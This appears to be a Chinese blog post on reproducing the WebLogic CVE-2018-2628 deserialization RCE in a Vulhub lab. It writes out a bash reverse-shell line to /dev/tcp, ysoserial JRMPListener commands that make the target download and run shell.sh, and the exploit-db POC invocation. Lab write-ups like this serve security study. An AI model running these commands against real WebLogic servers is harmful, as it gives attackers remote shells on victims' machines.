Vulnhub-Weblogic WLS Core Components 反序列化命令執(zhí)行漏洞(CVE-2018-2628)

鄭重聲明:所用漏洞環(huán)境為自建虛擬機(jī)vulnhub靶機(jī)環(huán)境,僅供本人學(xué)習(xí)使用。

漏洞簡(jiǎn)述

Oracle 2018年4月補(bǔ)丁中,修復(fù)了Weblogic Server WLS Core Components中出現(xiàn)的一個(gè)反序列化漏洞(CVE-2018-2628),該漏洞通過(guò)t3協(xié)議觸發(fā),可導(dǎo)致未授權(quán)的用戶在遠(yuǎn)程服務(wù)器執(zhí)行任意命令。

影響版本:10.3.6.0、12.1.3.0、12.2.1.2、12.2.1.3

準(zhǔn)備環(huán)境

測(cè)試機(jī)IP:192.168.79.129

靶機(jī)IP:192.168.79.131

1. 啟動(dòng)Vulnhub靶機(jī)環(huán)境:

2. 驗(yàn)證靶機(jī)應(yīng)用啟用成功:

3. 通過(guò)nmap掃描確認(rèn)Weblogic版本

漏洞復(fù)現(xiàn)

POC 引用:https://www.exploit-db.com/exploits/44553

1. 準(zhǔn)備 ysoserial-0.0.6-SNAPSHOT-BETA-all.jar

https://github.com/brianwrf/ysoserial/releases/download/0.0.6-pri-beta/ysoserial-0.0.6-SNAPSHOT-BETA-all.jar

2. 準(zhǔn)備反彈Shell文件shell.sh

bash -i >& /dev/tcp/192.168.79.129/4444 0>&1

3. 啟JRMPListener和執(zhí)行的命令

java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections1 'wget 192.168.79.129/shell.sh'

4.啟http server

5. 執(zhí)行POC腳本

python exploit.py 192.168.79.131 7001 ysoserial-0.0.6-SNAPSHOT-BETA-all.jar 192.168.79.129 1099 JRMPClient

靶機(jī)已下載了反彈Shell文件

6. 使用NC偵聽(tīng)反彈端口

7. 重復(fù)之前的步驟

a. 準(zhǔn)備JRMPListener和執(zhí)行的命令,來(lái)執(zhí)行反彈Shell文件

java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar

ysoserial.exploit.JRMPListener 1099 CommonsCollections1 'bash shell.sh'

b. 執(zhí)行POC腳本

得到反彈Shell

關(guān)閉環(huán)境

最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
【社區(qū)內(nèi)容提示】社區(qū)部分內(nèi)容疑似由AI輔助生成,瀏覽時(shí)請(qǐng)結(jié)合常識(shí)與多方信息審慎甄別。
平臺(tái)聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點(diǎn),簡(jiǎn)書(shū)系信息發(fā)布平臺(tái),僅提供信息存儲(chǔ)服務(wù)。

友情鏈接更多精彩內(nèi)容